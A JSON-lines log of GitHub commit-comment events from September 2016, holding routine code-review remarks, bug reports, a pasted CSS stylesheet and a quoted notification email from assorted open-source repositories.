{"id":"4554202100","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18997795,"position":4,"line":28,"path":"std/Math.hx","commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T08:37:32Z","updated_at":"2016-09-13T08:37:32Z","body":"What do you mean? "}},"created_at":"2016-09-13T08:37:32Z"}
{"id":"4554203741","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18997799,"position":null,"line":null,"path":null,"commit_id":"3fe3ded3644a094b05b0378adc6024ed5de78f02","created_at":"2016-09-13T08:37:55Z","updated_at":"2016-09-13T08:37:55Z","body":"Nice. Thanks @sschuberth 👍 "}},"created_at":"2016-09-13T08:37:55Z"}
{"id":"4554205199","type":"CommitCommentEvent","actor":{"login":"Psycojoker"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18997804,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:38:16Z","updated_at":"2016-09-13T08:38:16Z","body":"A cleaner way would be to create our own \"binary\"/script that do that for us instead of generating python code."}},"created_at":"2016-09-13T08:38:16Z"}
{"id":"4554206054","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"Shazwazza/Articulate"},"payload":{"comment":{"id":18997808,"position":null,"line":null,"path":null,"commit_id":"d39e064c73bbdb0c6941118c84cc56ab84038eff","created_at":"2016-09-13T08:38:28Z","updated_at":"2016-09-13T08:38:28Z","body":"If you have steps to replicate, please file a new issue with details and i'll see what i can do"}},"created_at":"2016-09-13T08:38:28Z"}
{"id":"4554206348","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18997809,"position":null,"line":null,"path":null,"commit_id":"c62d87301a16e6fef4235f9d9c19296b8d8cfcc1","created_at":"2016-09-13T08:38:32Z","updated_at":"2016-09-13T08:38:32Z","body":"got a bug in lobby in new update\r\nbut the adventure is fine if not change to other mode (gold chamber,arena etc)"}},"created_at":"2016-09-13T08:38:32Z"}
{"id":"4554206779","type":"CommitCommentEvent","actor":{"login":"haozheMa"},"repo":{"name":"haozheMa/PullAndDownDemo2"},"payload":{"comment":{"id":18997813,"position":null,"line":null,"path":null,"commit_id":"5fb1b3db8b786658b7d6b1a534d20e481784ea21","created_at":"2016-09-13T08:38:37Z","updated_at":"2016-09-13T08:38:37Z","body":"@heroes7 同学你好，这个demo是临时写的，内容比较简单，原理是：一个两倍屏幕高度的View，上半部分添加了一个tableview，下半部分添加了一个webview，从上半部分到下半部分通过“scrollViewDidScroll”这个代理实现，由下半部分到上半部分是通过MJ下拉刷新实现的。webview加载的是百度网页“[_webView loadRequest:[NSURLRequest requestWithURL:[NSURL URLWithString:@\"http://www.baidu.com\"]]];”，本人能力有限，希望能帮到你。"}},"created_at":"2016-09-13T08:38:37Z"}
{"id":"4554207626","type":"CommitCommentEvent","actor":{"login":"jiyinyiyong"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":18997815,"position":null,"line":null,"path":null,"commit_id":"7a2c986722447f270354221c13a84deea2e100fd","created_at":"2016-09-13T08:38:48Z","updated_at":"2016-09-13T08:38:48Z","body":"So now Vue would insert app html into `<div id=\"vue-app\" server-rendered=\"true\"></div>`? Looking forward to the docs."}},"created_at":"2016-09-13T08:38:48Z"}
{"id":"4554210200","type":"CommitCommentEvent","actor":{"login":"antigloss"},"repo":{"name":"antigloss/go"},"payload":{"comment":{"id":18997817,"position":null,"line":null,"path":null,"commit_id":"246be9c619517216ebff72a92c48d71ef722ad9b","created_at":"2016-09-13T08:39:24Z","updated_at":"2016-09-13T08:39:24Z","body":"There shall be no problem even if `gProgname` contains no backslashes. If `gProgname` contains no backslashes, `tmpProgname[len(tmpProgname)-1]` is exactly what `gProgname` was before splitting."}},"created_at":"2016-09-13T08:39:24Z"}
{"id":"4554214867","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997823,"position":66,"line":66,"path":"ryu/app/simple_switch_igmp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T08:40:24Z","updated_at":"2016-09-13T08:40:24Z","body":"以下の様にsimple_switch_13.SimpleSwitch13を継承し\r\nswitch_features_handlerとadd_flowを削除しました。\r\n\r\n````\r\nimport simple_switch_13\r\nclass SimpleSwitchIgmp13(simple_switch_13.SimpleSwitch13):\r\n````\r\n\r\nRyu-bookの内容に従いアプリケーションを実行したところ、差分なく動作できました。\r\n"}},"created_at":"2016-09-13T08:40:24Z"}
{"id":"4554218477","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18997832,"position":null,"line":null,"path":null,"commit_id":"9b5e164554bd6d697e3fffc3c271e086e1a1ba93","created_at":"2016-09-13T08:41:11Z","updated_at":"2016-09-13T08:41:11Z","body":"Этот фикс не используется "}},"created_at":"2016-09-13T08:41:11Z"}
{"id":"4554218947","type":"CommitCommentEvent","actor":{"login":"Bo98"},"repo":{"name":"Facepunch/garrysmod-issues"},"payload":{"comment":{"id":18997834,"position":5,"line":5,"path":".github/ISSUE_TEMPLATE.md","commit_id":"82d5a2f27a3c6c351f8dfb6eadc1f3ae7c345857","created_at":"2016-09-13T08:41:16Z","updated_at":"2016-09-13T08:41:16Z","body":"> Tell us to to"}},"created_at":"2016-09-13T08:41:16Z"}
{"id":"4554220563","type":"CommitCommentEvent","actor":{"login":"dbarrosop"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18997837,"position":4,"line":17,"path":"napalm_ios/__init__.py","commit_id":"993d0d7d10401d204efe3c24ff0236421e506af3","created_at":"2016-09-13T08:41:37Z","updated_at":"2016-09-13T08:41:37Z","body":"Feel free to send a PR and test it works as expected."}},"created_at":"2016-09-13T08:41:37Z"}
{"id":"4554221872","type":"CommitCommentEvent","actor":{"login":"smart09"},"repo":{"name":"smart09/4G"},"payload":{"comment":{"id":18997839,"position":1,"line":1,"path":"css/css","commit_id":"19204df0e43ceab0b5b40e75381401db659021b3","created_at":"2016-09-13T08:41:52Z","updated_at":"2016-09-13T08:41:52Z","body":"/* CSS Document */\r\nbody{\r\n  font:normal 12px/1.5 'Microsoft YaHei','\\5FAE\\8F6F\\96C5\\9ED1';\r\n  color:#333;\r\n}\r\nhtml{\r\n  color:#333;\r\n  background:#fff;\r\n}\r\nbody,ul,li,ol,div,dt,dl,dd,form,h1,h2,h3,h4,h5,h6,pre,button,p,cod,input,th,td,tr,atricle,footer,nav,section,em,span{\r\n  margin:0;\r\n  padding:0;\r\n}\r\nimg{\r\n  border:0;\r\n  vertical-align:top;\r\n}\r\na{\r\n  color:#333;\r\n  text-decoration:none;\r\n}\r\nul,li{\r\n  list-style:none;\r\n}\r\nh1,h2,h3,h4,h5,h6{\r\n  font-size:100%;\r\n  font-weight:500;\r\n}\r\naddress,caption,cite,code,dfn,em,th,var{\r\n  font-style:normal;\r\n  font-weight:500;\r\n}\r\n.fn-clear{\r\n  zoom:1;\r\n}\r\n.clear:after{\r\n  content:\".\";\r\n  display:block;\r\n  height:0;\r\n  clear:both;\r\n}\r\n.fn-clear:after{\r\n  visibility:hidden;\r\n  display:block;\r\n  font-size:0;\r\n  clear:both;\r\n  height:0;\r\n  content:\"\";\r\n}\r\ni,em{\r\n  display:inline-block;\r\n  font-style:normal;\r\n}\r\n.fl, .fr{\r\n  position:relative;\r\n}\r\n.fl{\r\n  float:left;\r\n}\r\n.fr{\r\n  float:right;\r\n}\r\ndiv{\r\n  display:block;\r\n}\r\n.clear{\r\n  clear:both;\r\n}\r\n.clearfix{\r\n}\r\na:hover{\r\n  text-decoration:underline;\r\n}\r\n.bg1{\r\n\tbackground: url(../img/1.png) no-repeat 50% 50%;\r\n\theight: 326px;\r\n}\r\n.bg2{\r\n\tbackground: url(../img/2.png) no-repeat 50% 50%;\r\n\theight: 349px;\r\n\tmargin-bottom: 60px;\r\n}\r\n.w1000{\r\n\twidth: 1000px;\r\n\tmargin: 0 auto;\r\n}\r\n.o{\r\n\toverflow: hidden;\r\n}\r\n.context{\r\n\twidth: 384px;\r\n\tmargin-left: 16px;\r\n\tline-height: 30px;\r\n\tpadding-top: 73px;\r\n\tbackground: url(../img/4G_tit17450.png) no-repeat;\r\n\ttext-indent: 20px;\r\n\tfont-size: 14px;\r\n\tcolor: #636363;\r\n\tfont-family: \"\\5B8B\\4F53\", Tahoma, Helvetica, san-serif;\r\n}\r\n.context a{\r\n\tcolor: #636363;\r\n\tfont-family: \"\\5B8B\\4F53\", Tahoma, Helvetica, san-serif;\r\n}\r\n.context a:hover{\r\n\tcolor: #f60;\r\n}\r\n.focus{\r\n\twidth: 457px;\r\n\theight: 290px;\r\n\tmargin-left: 76px;\r\n\tpadding: 16px 16px 33px;\r\n\tbackground: url(../img/4G_tit_rbg488355.png) no-repeat;\r\n}\r\n.focus .focus_con{\r\n\twidth: 450px;\r\n\theight: 290px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.focus .focus_con ul{\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\ttop: 0;\r\n\theight: 290px;\r\n\toverflow: hidden;\r\n}\r\n.focus .focus_con li{\r\n\tfloat: left;\r\n\theight: 290px;\r\n\tposition: relative;\r\n}\r\n.focus_con li img{\r\n\twidth: 450px;\r\n\theight: 290px;\r\n}\r\n.focus_con .dot{\r\n\twidth: 100%;\r\n\theight: 30px;\r\n\tline-height: 30px;\r\n\ttext-align: center;\r\n\tbackground-color: #636363;\r\n\topacity: 0.8;\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\tbottom: 0;\r\n}\r\n.focus_con .dot span{\r\n\tdisplay: inline-block;\r\n\twidth: 10px;\r\n\theight: 10px;\r\n\tborder-radius: 50%;\r\n\tbackground-color: #fff;\r\n\tmargin-right: 8px;\r\n\tcursor: pointer;\r\n}\r\n.focus_con .dot span.active{\r\n\tbackground-color: #FF6600;\r\n}\r\n.mb50{\r\n\tmargin-bottom: 50px;\r\n}\r\n.bg3{\r\n\tbackground: url(../img/wz2.png) no-repeat 50% 50px;\r\n}\r\n.wrapper{\r\n\twidth: 100%;\r\n\tbackground: url(../img/bg1.png) repeat-x;\r\n\theight: 637px;\r\n}\r\n.bg4{\r\n\tbackground: url(../img/wz1.png) no-repeat 50% 67px;\r\n\theight: 295px;\r\n}\r\n.w962{\r\n\twidth: 962px;\r\n\tmargin: 0 auto;\r\n}\r\n.w962 ul{\r\n\twidth: 962px;\r\n}\r\n.w962 li{\r\n\twidth: 73px;\r\n\tposition: relative;\r\n\tmargin-right: 1px;\r\n\tfloat: left;\r\n\theight: 65px;\r\n\tcursor: pointer;\r\n\tbackground: url(../img/xx.jpg) 0 50% repeat-x;\r\n}\r\n.w962 li.show{\r\n\tbackground: url(../img/xx1.jpg) 0 50% repeat-x !important;\r\n}\r\n.timer, .timer1{\r\n\tfont-size: 14px;\r\n\tfont-family: \"\\5FAE\\8F6F\\96C5\\9ED1\";\r\n\tcolor: #FFFFFF;\r\n\tline-height: 20px;\r\n\tposition: absolute;\r\n\tleft: 5px;\r\n\ttop: 0;\r\n\tz-index: 3;\r\n}\r\n.jiao_t{\r\n\tposition: absolute;\r\n\tleft: 57px;\r\n\ttop: 23px;\r\n\tdisplay: inline-block;\r\n\tborder: 6px solid #ffc973;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-top: 0;\r\n\twidth: 0;\r\n\theight: 0;\r\n\tline-height: 0;\r\n\tfont-size: 0;\r\n}\r\n.w962 li.show .jiao_t{\r\n\tborder: 6px solid #FFFFFF;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-top: 0;\r\n}\r\n.jiao_b{\r\n\tposition: absolute;\r\n\tleft: 57px;\r\n\tbottom: 22px;\r\n\tdisplay: inline-block;\r\n\tborder: 6px solid #ffc973;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-bottom: 0;\r\n\twidth: 0;\r\n\theight: 0;\r\n\tline-height: 0;\r\n\tfont-size: 0;\r\n}\r\n.w962 li.show .jiao_b{\r\n\tborder: 6px solid #FFFFFF;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-bottom: 0;\r\n}\r\n.txt_bg, .txt_bg1{\r\n\tbackground: url(../img/bg.png) no-repeat;\r\n\twidth: 120px;\r\n\theight: 126px;\r\n\tpadding: 28px 20px 61px 19px;\r\n\tfont-size: 12px;\r\n\tline-height: 18px;\r\n\tcolor: #a7a7a7;\r\n\tfont-family: arial;\r\n\tposition: absolute;\r\n\tleft: -21px;\r\n\ttop: -198px;\r\n\tdisplay: none;\r\n}\r\n.w962 li.show div.c{\r\n\tdisplay: block;\r\n}\r\n.txt_bg1{\r\n\tbackground: url(../img/timer_bg.png) no-repeat;\r\n\tleft: -21px;\r\n\tpadding: 56px 20px 33px 19px;\r\n\tleft: -22px;\r\n\ttop: 52px;\r\n}\r\n.txt_bg a, .txt_bg1 a{\r\n\tcolor: #a7a7a7;\r\n}\r\n.txt_bg a:hover, .txt_bg1 a:hover{\r\n\tcolor: #FF6600;\r\n}\r\n.w_con{\r\n\tmargin-top: 220px;\r\n}\r\n.w_con ul{\r\n\toverflow: hidden;\r\n}\r\n.w_con li{\r\n\tfloat: left;\r\n\twidth: 240px;\r\n\theight: 325px;\r\n\tpadding: 18px 18px 28px;\r\n\tmargin: 0 20px 0 33px;\r\n\tbackground: url(../img/list_bg.png) no-repeat;\r\n}\r\n.wrapper2{\r\n\twidth: 100%;\r\n\tbackground: url(../img/bg2.png) repeat-x;\r\n\theight: 736px;\r\n\tmargin-top: 40px;\r\n}\r\n.bg5{\r\n\tbackground: url(../img/wz3.png) no-repeat 50% 72px;\r\n\tpadding: 245px 0 0 0;\r\n}\r\n.change_con{\r\n\twidth: 1000px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.c_bigpic{\r\n\twidth: 430px;\r\n\tmargin: 0 30px 0 40px;\r\n}\r\n.c_bigpic .h244{\r\n\twidth: 430px;\r\n\theight: 244px;\r\n\toverflow: hidden;\r\n}\r\n.bei14b, .bei14b a{\r\n\tfont-size: 14px;\r\n\tline-height: 32px;\r\n\tcolor: #f3f3f3;\r\n\tfont-weight: bold;\r\n\tdisplay: block;\r\n\tmargin: 10px 0;\r\n}\r\n.bei14b a:hover{\r\n\tcolor: #FF6600;\r\n}\r\n.bei14{\r\n\tline-height: 22px;\r\n\tcolor: #F3F3F3;\r\n\tfont-size: 14px;\r\n\tvertical-align: top;\r\n}\r\n.c_spicbox{\r\n\twidth: 480px;\r\n}\r\n.c_spicbox .c_spic_con{\r\n\theight: 180px;\r\n\tmargin-bottom: 32px;\r\n\toverflow: hidden;\r\n}\r\n.c_spic{\r\n\twidth: 240px;\r\n\theight: 180px;\r\n\tmargin-right: 10px;\r\n\tfloat: left;\r\n}\r\n.orange{\r\n\tcolor: #FF6600;\r\n}\r\n.orange:hover{\r\n\tcolor: #FF3333;\r\n}\r\n.bg6{\r\n\tbackground: url(../img/wz4.png) no-repeat 50% 65px;\r\n}\r\n.w_con2{\r\n\theight: 278px;\r\n\tpadding-top: 220px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.w_con2 ul{\r\n\tposition: absolute;\r\n\toverflow: hidden;\r\n\twidth: auto;\r\n\theight: 278px;\r\n}\r\n.w_con2_pic{\r\n\twidth: 866px;\r\n\theight: 278px;\r\n\tmargin-left: 61px;\r\n\toverflow: hidden;\r\n\tposition: relative;\r\n}\r\n.w_con2_pic li{\r\n\tfloat: left;\r\n\twidth: 194px;\r\n\theight: 278px;\r\n\tmargin-right: 30px;\r\n\toverflow: hidden;\r\n}\r\n.w_con2_pic li img{\r\n\twidth: 192px;\r\n\theight: 276px;\r\n\tborder: 1px solid #e3e3e3;\r\n}\r\n.c_btn{\r\n\tdisplay: inline-block;\r\n\twidth: 24px;\r\n\theight: 278px;\r\n\tbackground: url(../img/tou.png) no-repeat;\r\n\tposition: absolute;\r\n\ttop:220px;\r\n}\r\n.prev{\r\n\tleft: 0;\r\n}\r\n.next{\r\n\tright: 0;\r\n\tbackground-position: -25px 0;\r\n}\r\n.prev:hover{\r\n\tbackground-position: -52px 0;\r\n}\r\n.next:hover{\r\n\tbackground-position: -76px 0;\r\n}\r\n.dw{\r\n\tmargin: 40px 68px 70px 38px;\r\n}\r\n.dw_con{\r\n\twidth: 410px;\r\n\tfloat: left;\r\n}\r\n.dw_con h2{\r\n\tfont-size: 20px;\r\n\tfont-family:\"microsoft yahei\";\r\n\theight: 38px;\r\n\tline-height: 38px;\r\n\tmargin-bottom: 5px;\r\n}\r\n.dw_con h2 a{\r\n\tcolor: #4463B3;\r\n\ttext-decoration: underline;\r\n}\r\n.dw_con p{\r\n\tfont-size: 12px;\r\n\tcolor: #666666;\r\n\tline-height: 24px;\r\n\tfont-family: arial;\r\n}\r\n.dw_con .spic{\r\n\tmargin-top: 13px;\r\n}\r\n.dw_con .spic img{\r\n\twidth: 406px;\r\n\theight: 222px;\r\n}\r\n.dw_con .bigpic{\r\n\twidth: 426px;\r\n\theight: 422px;\r\n}\r\n.bg7{\r\n\tbackground: url(../img/wz5.png) no-repeat 50% 72px;\r\n\tpadding: 245px 0 0 0;\r\n}\r\n.say{\r\n\tmargin: 0 40px;\r\n\toverflow: hidden;\r\n}\r\n.s_list{\r\n\twidth: 365px;\r\n\theight: 92px;\r\n\tpadding: 10px 12px 10px 13px;\r\n\tmargin-bottom: 30px;\r\n\tbackground-color: #FFFFFF;\r\n}\r\n.s_list .s_item .s_pic{\r\n\twidth: 92px;\r\n\theight: 92px;\r\n\tfloat: left;\r\n\tmargin-right: 15px;\r\n\toverflow: hidden;\r\n}\r\n.s_list .s_item .s_pic1{\r\n\tfloat: right;\r\n\tmargin-left: 15px;\r\n\tmargin-right: 0;\r\n}\r\n.s_list .s_item  img{\r\n\twidth: 92px;\r\n\theight: 92px;\r\n}\r\n.s_list .s_item h2{\r\n\tfont-family: arial;\r\n\theight: 20px;\r\n\tline-height: 20px;\r\n\tpadding: 3px 0;\r\n\tfont-weight: bold;\r\n}\r\n.s_list .s_item h2 a{\r\n\tcolor: #6f6f6f;\r\n}\r\n.s_list .s_item p{\r\n\tline-height: 18px;\r\n\tcolor: #6f6f6f;\r\n\tfont-family: arial;\r\n}\r\n.s_txt{\r\n\twidth: 254px;\r\n\theight: 92px;\r\n\toverflow: hidden;\r\n}\r\n.bg8{\r\n\tbackground: url(../img/wz6.png) no-repeat 50% 60px;\r\n}\r\n.w_con3{\r\n\tmargin-top: 255px;\r\n\toverflow: hidden;\r\n}\r\n.silder-navbox{\r\n\tposition: fixed;\r\n\tleft: 50%;\r\n\tbottom: 120px;\r\n\twidth: 129px;\r\n\theight: 369px;\r\n\tmargin-left: 510px;\r\n\tbackground: url(../img/pf1.png) no-repeat;\r\n\tz-index: 9999;\r\n}\r\n.silder-nav{\r\n\tmargin-top: 91px;\r\n\theight: 202px;\r\n}\r\n.silder-nav a{\r\n\tdisplay: block;\r\n\theight: 32px;\r\n\tline-height: 32px;\r\n\tfont-size: 14px;\r\n\tcolor: #FFFFFF;\r\n\ttext-align: center;\r\n}\r\n.silder-nav a:hover{\r\n\tcolor: #FF6600;\r\n\ttext-decoration: none;\r\n}\r\n.top{\r\n\twidth: 42px;\r\n\theight: 42px;\r\n\tdisplay: block;\r\n\tmargin-left: 39px;\r\n}"}},"created_at":"2016-09-13T08:41:52Z"}
{"id":"4554222146","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997840,"position":4,"line":523,"path":"core/controllers/reader.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:41:56Z","updated_at":"2016-09-13T08:41:56Z","body":"Might as well just do the fetch in the elif branch, so that it's only done when necessary."}},"created_at":"2016-09-13T08:41:56Z"}
{"id":"4554222322","type":"CommitCommentEvent","actor":{"login":"longsy316"},"repo":{"name":"longsy316/workflow"},"payload":{"comment":{"id":18997842,"position":null,"line":null,"path":null,"commit_id":"b64dc272db331d3a6978be446c576f18e02c6cf1","created_at":"2016-09-13T08:41:59Z","updated_at":"2016-09-13T08:41:59Z","body":"111"}},"created_at":"2016-09-13T08:41:59Z"}
{"id":"4554223874","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997850,"position":6,"line":440,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:42:20Z","updated_at":"2016-09-13T08:42:20Z","body":"What is leading_skills_p? Might want a more explicit name that conveys what it conceptually represents."}},"created_at":"2016-09-13T08:42:20Z"}
{"id":"4554224803","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997852,"position":7,"line":441,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:42:31Z","updated_at":"2016-09-13T08:42:31Z","body":"No idea what these mean; they need better names."}},"created_at":"2016-09-13T08:42:31Z"}
{"id":"4554226650","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"bioperl/bioperl-live"},"payload":{"comment":{"id":18997859,"position":null,"line":null,"path":null,"commit_id":"e5023eef64adfb4e41598670c14d4e99789ea37c","created_at":"2016-09-13T08:42:55Z","updated_at":"2016-09-13T08:42:55Z","body":"I've seen there hasn't been any 1.6 release, that's why we're using the 1.6.x branch straight from git. And we  won't immediately move to 1.7, so that would be helpful if you can cherry-pick (or I can submit a PR)"}},"created_at":"2016-09-13T08:42:55Z"}
{"id":"4554229863","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997868,"position":5,"line":36,"path":"src/game/AI/CreatureAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:43:38Z","updated_at":"2016-09-13T08:43:38Z","body":"Iam not sure this is correct.\r\ngetVictim return current selected victim of that creature. Meaning it already attack something. So it dont have to start an attack against new attacker."}},"created_at":"2016-09-13T08:43:38Z"}
{"id":"4554231103","type":"CommitCommentEvent","actor":{"login":"preethi29"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":18997873,"position":null,"line":null,"path":null,"commit_id":"4268b44abde41948a4c8b92b358505fcff0cc9a9","created_at":"2016-09-13T08:43:54Z","updated_at":"2016-09-13T08:43:54Z","body":"@dkayiwa thanks that would work for us."}},"created_at":"2016-09-13T08:43:54Z"}
{"id":"4554232569","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997876,"position":11,"line":445,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:44:14Z","updated_at":"2016-09-13T08:44:14Z","body":"What are \"leading skills\"? Maybe add a comment that explains this. Also, would \"learned_skills\" be a better term?\r\n\r\nAlso, this isn't really a getter. Maybe call it recursively_find_learned_skills() or something like that?"}},"created_at":"2016-09-13T08:44:14Z"}
{"id":"4554235612","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997880,"position":4,"line":438,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:44:51Z","updated_at":"2016-09-13T08:44:51Z","body":"The logic here is sufficiently complicated that I think this method might warrant a general docstring explaining the underlying logic."}},"created_at":"2016-09-13T08:44:51Z"}
{"id":"4554239026","type":"CommitCommentEvent","actor":{"login":"Ashsule"},"repo":{"name":"Ashsule/Product-ABC"},"payload":{"comment":{"id":18997886,"position":null,"line":null,"path":null,"commit_id":"673afc29ff94f7bd8924d8b1a46768cd2b537484","created_at":"2016-09-13T08:45:32Z","updated_at":"2016-09-13T08:45:32Z","body":"i have changed this file"}},"created_at":"2016-09-13T08:45:32Z"}
{"id":"4554243425","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":18997893,"position":4,"line":438,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-13T08:46:29Z","updated_at":"2016-09-13T08:46:29Z","body":"Also, can you add a range of backend tests for this method? Try and find as many different \"types\" of test cases as possible -- basically, think about this from an adversarial point of view, and try to \"break\" your method! That will help you ensure that the logic is robust."}},"created_at":"2016-09-13T08:46:29Z"}
{"id":"4554243951","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18997895,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T08:46:34Z","updated_at":"2016-09-13T08:46:34Z","body":"@marcshilling There are 2 methods, one with the old signature marked as deprecated. So you should be able to use the old signature until its removed"}},"created_at":"2016-09-13T08:46:34Z"}
{"id":"4554244348","type":"CommitCommentEvent","actor":{"login":"Ashsule"},"repo":{"name":"Ashsule/Product-ABC"},"payload":{"comment":{"id":18997897,"position":null,"line":null,"path":null,"commit_id":"673afc29ff94f7bd8924d8b1a46768cd2b537484","created_at":"2016-09-13T08:46:40Z","updated_at":"2016-09-13T08:46:40Z","body":"h"}},"created_at":"2016-09-13T08:46:40Z"}
{"id":"4554250203","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18997904,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-13T08:47:54Z","updated_at":"2016-09-13T08:47:54Z","body":"В дереве уже включено, значит и ядре нужно)"}},"created_at":"2016-09-13T08:47:54Z"}
{"id":"4554251545","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997909,"position":14,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:48:13Z","updated_at":"2016-09-13T08:48:13Z","body":"Its a good start but as i said we have to avoid using the UNIT_FLAG, we have better equivalent by using UNIT_STAT_XXX and in this case -> UNIT_STAT_CAN_NOT_MOVE fit correctly."}},"created_at":"2016-09-13T08:48:13Z"}
{"id":"4554252378","type":"CommitCommentEvent","actor":{"login":"bangwu93"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997911,"position":null,"line":null,"path":null,"commit_id":"9ff9337a7558b00c0c2fea26f3f507b0bb413539","created_at":"2016-09-13T08:48:21Z","updated_at":"2016-09-13T08:48:21Z","body":"Dear Vivian, \n\n \n\nRegarding the pulling, what will I need to pull?\n\n \n\n\n\n \n\nBangwu\n\n \n\nFrom: kwonn [mailto:notifications@github.com] \nSent: Tuesday, 13 September 2016 4:14 PM\nTo: sunset1215/rcs <rcs@noreply.github.com>\nCc: bangwu93 <bangwu.hong@hotmail.com>; Mention <mention@noreply.github.com>\nSubject: Re: [sunset1215/rcs] Add B1.txt (9ff9337)\n\n \n\nI have pulled.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/sunset1215/rcs/commit/9ff9337a7558b00c0c2fea26f3f507b0bb413539#commitcomment-18997570> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AUNh-l0TuiLcesG6AjHFrbYkjLh_pBlDks5qpltNgaJpZM4J6CSa> .  <https://github.com/notifications/beacon/AUNh-pFaQzr-K8N6ijVtVbEtrqI-iNWlks5qpltNgaJpZM4J6CSa.gif> \n\n"}},"created_at":"2016-09-13T08:48:21Z"}
{"id":"4554255572","type":"CommitCommentEvent","actor":{"login":"werty100"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18997918,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T08:49:00Z","updated_at":"2016-09-13T08:49:00Z","body":"@sndnvaps i have the same problem with audio but fixed with new flags:\r\nUSE_CUSTOM_AUDIO_POLICY := 1\r\nUSE_XML_AUDIO_POLICY_CONF := 1 (i have add the corresponding xm to device tree)\r\nand remove BOARD_USES_LEGACY_ALSA_AUDIO := true\r\n\r\n"}},"created_at":"2016-09-13T08:49:00Z"}
{"id":"4554258973","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997925,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T08:49:42Z","updated_at":"2016-09-13T08:49:42Z","body":"@bangwu93 Thanks for rushing on this\r\n@kwonn Nathan, please pull this latest commit. Once you do, we'll be set to proceed for LO-MergeConflicts. "}},"created_at":"2016-09-13T08:49:42Z"}
